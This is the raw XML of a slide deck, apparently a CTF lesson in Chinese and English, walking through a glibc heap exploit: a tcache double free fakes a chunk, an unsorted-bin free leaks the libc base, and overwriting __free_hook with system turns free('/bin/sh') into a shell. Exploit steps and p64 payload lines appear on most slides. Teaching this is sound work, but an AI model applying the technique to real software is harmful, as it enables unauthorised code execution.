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57" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264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B2B2B2"/>
    <a:srgbClr val="202020"/>
    <a:srgbClr val="323232"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="CC00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15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2022/4/2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11B410-920F-4D66-8338-F5DF113C8D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039906" y="914400"/>
            <a:ext cx="101121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题目漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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endParaRPr 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有一个指针 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ptr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 用于 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malloc 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和 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free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，有 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double free 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漏洞。此外还有一个 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name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，可以打印内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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endParaRPr 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sz="2400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思考</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400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普通的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double free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漏洞怎么用，无非是把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got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改成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、把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hook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改成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system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等。但是为什么这里失效了？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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endParaRPr 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  <a:p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因为要知道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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libc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地址才知道，所以这题就是想告诉我们如何结合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double free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和一个可以打印的变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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name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，泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" pitchFamily="49" charset="-122"/>
                <a:ea typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" pitchFamily="49" charset="-122"/>
              <a:ea typeface="YaHei Consolas Hybrid" panose="020B0509020204020204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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885180" y="1168400"/>
            <a:ext cx="546862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Step1 ： Double Free in tcache bin</a:t>
            </a:r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 =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malloc(0x50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'aaaaaaaa'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free(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free(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 =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malloc(0x50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p64(name_addr + 0x500 - 0x10))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 =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malloc(0x50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'bbbbbbbb'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 =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(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0x50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p64(0) + p64(0x21)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p64(0) * 3 + p64(0x21)</a:t>
            </a:r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24865" y="110807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- 0x010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4865" y="1457960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- 0x008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24865" y="180784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24865" y="2157730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24865" y="250761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ptr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24865" y="2857500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68" name="Rectangle 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824865" y="320738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24865" y="3557270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24865" y="390715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+ 0x4F0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24865" y="425704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+ 0x4F8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24865" y="460692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+ 0x500</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Rectangle 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824865" y="495681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+ 0x508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24865" y="5306695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+ 0x510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24865" y="5656580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+ 0x518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496185" y="110807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96185" y="1457960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496185" y="180784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my_name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496185" y="2157730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my_name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496185" y="250761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+ 0x4F0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496185" y="2857500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....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496185" y="320738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496185" y="3557270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84" name="Rectangle 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496185" y="390715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496185" y="425704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0x21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496185" y="460692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496185" y="495681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496185" y="5306695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496185" y="5656580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0x21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14137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4865" y="110807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- 0x010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865" y="145796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- 0x008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824865" y="180784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4865" y="215773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4865" y="250761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ptr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865" y="285750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4865" y="320738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4865" y="355727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4865" y="390715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+ 0x4F0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4865" y="425704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+ 0x4F8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4865" y="460692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4865" y="495681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+ 0x508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4865" y="5306695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4865" y="5656580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96185" y="110807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96185" y="145796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0x501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6185" y="180784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aaaa...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6185" y="215773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aaaa...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96185" y="250761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name_addr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96185" y="285750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96185" y="320738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96185" y="355727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96185" y="390715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96185" y="425704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0x21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96185" y="460692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96185" y="495681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96185" y="5306695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96185" y="5656580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0x21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text Box 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885180" y="1168400"/>
            <a:ext cx="546862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Step2 ： Double Free in tcache bin</a:t>
            </a:r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 =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malloc(0x60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 'cccccccc'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free(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free(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 =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malloc(0x60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p64(name_addr - 0x10))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 =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malloc(0x60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'dddddddd'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 =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malloc(0x60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p64(0) + p64(0x501) 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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>aaaa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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'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 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* some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+ p64(name_addr)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4865" y="110807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- 0x010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865" y="145796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- 0x008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824865" y="180784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4865" y="215773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4865" y="250761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ptr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865" y="285750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4865" y="320738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4865" y="355727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4865" y="390715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+ 0x4F0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4865" y="425704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+ 0x4F8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4865" y="460692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4865" y="495681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+ 0x508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4865" y="5306695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4865" y="5656580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96185" y="110807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96185" y="145796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0x501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6185" y="180784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aaaa...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6185" y="215773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aaaa...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96185" y="250761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name_addr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96185" y="285750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96185" y="320738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96185" y="355727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96185" y="390715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96185" y="425704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b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0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0x21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96185" y="460692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96185" y="495681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96185" y="5306695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96185" y="5656580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b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0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0x21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text Box 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885180" y="1168400"/>
            <a:ext cx="597154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dirty="0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Step3 ： Free(0x500) --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF330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in Unsorted bin!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill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endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill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 dirty="0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free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0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 ==&gt; free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1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name_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0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dirty="0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the parameter of free is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1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data_ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0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dirty="0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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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check: next-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C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prev_in_use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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?</a:t>
            </a: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altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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Check: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A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next in use? if no, free will merge it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="Elbow Connector 1"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="1"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="824865" y="1982470"/>
            <a:ext cx="3175" cy="2449195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9" idx="1"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="824865" y="4781550"/>
            <a:ext cx="3175" cy="1049655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0495" y="2673350"/>
            <a:ext cx="886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prev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use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50495" y="5121910"/>
            <a:ext cx="886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prev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in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4865" y="110807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- 0x010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824865" y="145796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- 0x008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824865" y="180784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9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824865" y="215773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4865" y="250761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ptr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4865" y="285750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4865" y="320738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4865" y="355727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4865" y="390715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+ 0x4F0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4865" y="425704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+ 0x4F8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24865" y="460692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24865" y="495681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+ 0x508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4865" y="5306695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+ 0x510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24865" y="5656580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+ 0x518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96185" y="110807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96185" y="145796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0x501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96185" y="180784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aaaa...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96185" y="215773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aaaa...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96185" y="250761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name_addr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96185" y="285750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496185" y="320738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96185" y="355727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96185" y="390715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496185" y="425704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b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0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0x21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496185" y="4606925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96185" y="4956810"/>
            <a:ext cx="1671320" cy="3498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496185" y="5306695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496185" y="5656580"/>
            <a:ext cx="1671320" cy="349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b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0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0x21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="Elbow Connector 1"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="1"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="824865" y="1982470"/>
            <a:ext cx="3175" cy="2449195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Elbow Connector 2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="1"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="824865" y="4781550"/>
            <a:ext cx="3175" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 760000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150495" y="2673350"/>
            <a:ext cx="886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prev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use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50495" y="5121910"/>
            <a:ext cx="886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prev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in use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79410" y="82931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- 0x010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79410" y="117919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- 0x008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979410" y="152908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79410" y="187896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name + 0x08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79410" y="222885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650730" y="82931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650730" y="117919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0x501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650730" y="152908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650730" y="187896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bk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650730" y="222885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979410" y="257873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979410" y="292862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650730" y="2578735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650730" y="2928620"/>
            <a:ext cx="1671320" cy="3498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...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98720" y="1179830"/>
            <a:ext cx="2501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000">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
                <a:ea typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
              </a:rPr>
              <a:t>unsorted bin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414010" y="170370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14010" y="2053590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bk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="Straight Arrow Connector 55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7085330" y="1704340"/>
            <a:ext cx="894080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7" idx="1"/>
            <a:endCxn id="52" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7085330" y="2044700"/>
            <a:ext cx="894080" cy="174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 flipH="1">
            <a:off x="5414010" y="1704340"/>
            <a:ext cx="5908040" cy="174625"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8286"/>
              <a:gd name="adj2" fmla="val 1212363"/>
              <a:gd name="adj3" fmla="val 10863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52" idx="1"/>
            <a:endCxn id="42" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5414010" y="2044700"/>
            <a:ext cx="5908040" cy="174625"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4031"/>
              <a:gd name="adj2" fmla="val -718181"/>
              <a:gd name="adj3" fmla="val 10403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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4577080" y="4257040"/>
            <a:ext cx="74612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print() will print the name, so know what fd is.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill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solidFill>
                  <a:srgbClr val="FF330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So, by (name), we can get unsorted bin address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill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solidFill>
                  <a:srgbClr val="FF330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get unsorted bin address --&gt; get main_arena address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF330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get main_arena address   --&gt; get libc_base address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4865" y="110807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free_hook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96185" y="110807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system_addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text Box 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885180" y="1168400"/>
            <a:ext cx="546862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Step4 ： Double Free in tcache bin</a:t>
            </a:r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malloc(0x70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 'eeeeeeeee'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free()</a:t>
            </a:r>
          </a:p>
          <a:p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free()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malloc(0x70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 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p64(free_hook_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addr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malloc(0x70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--&gt;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'fffffffff'</a:t>
            </a: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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>malloc(0x70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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--&gt;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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>p64(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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system_addr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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r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910715"/>
            <a:ext cx="5023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free_hook： free函数调用这里</a:t>
            </a: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和其他函数一样，通过libc偏移+libc基址得到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4865" y="110807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free_hook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96185" y="110807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system_addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text Box 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885180" y="1168400"/>
            <a:ext cx="546862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Step5 ： PWN!</a:t>
            </a:r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ptr = </a:t>
            </a:r>
            <a:r>
              <a:rPr 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malloc(0x</a:t>
            </a:r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18)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"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---&gt; ‘/bin/sh’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" alt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r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" charset="0"/>
                <a:ea typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
                <a:cs typeface="Source Code Pro" panose="020B0509030403020204" charset="0"/>
              </a:rPr>
              <a:t>free(ptr) ==&gt; system(/bin/sh)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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  <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Source Code Pro" panose="020B0509030403020204" charset="0"/>
              <a:ea typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
              <a:cs typeface="Source Code Pro" panose="020B0509030403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080" y="1910715"/>
            <a:ext cx="5023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free_hook： free函数调用这里</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
                <a:ea typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
                <a:cs typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
              </a:rPr>
              <a:t>和其他函数一样，通过libc偏移+libc基址得到</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901065" y="292036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ptr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2385" y="2920365"/>
            <a:ext cx="1671320" cy="349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600">
                <a:latin typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
                <a:ea typeface="YaHei Consolas Hybrid" panose="020B0509020204020204" charset="-122"/>
              </a:rPr>
              <a:t>/bin/sh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683</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>227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宋体</vt:lpstr>
      <vt:lpstr>YaHei Consolas Hybrid</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Source Code Pro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allen</dc:creator>
  <cp:lastModifiedBy>allen</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-10T05:44:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-02T14:10:50Z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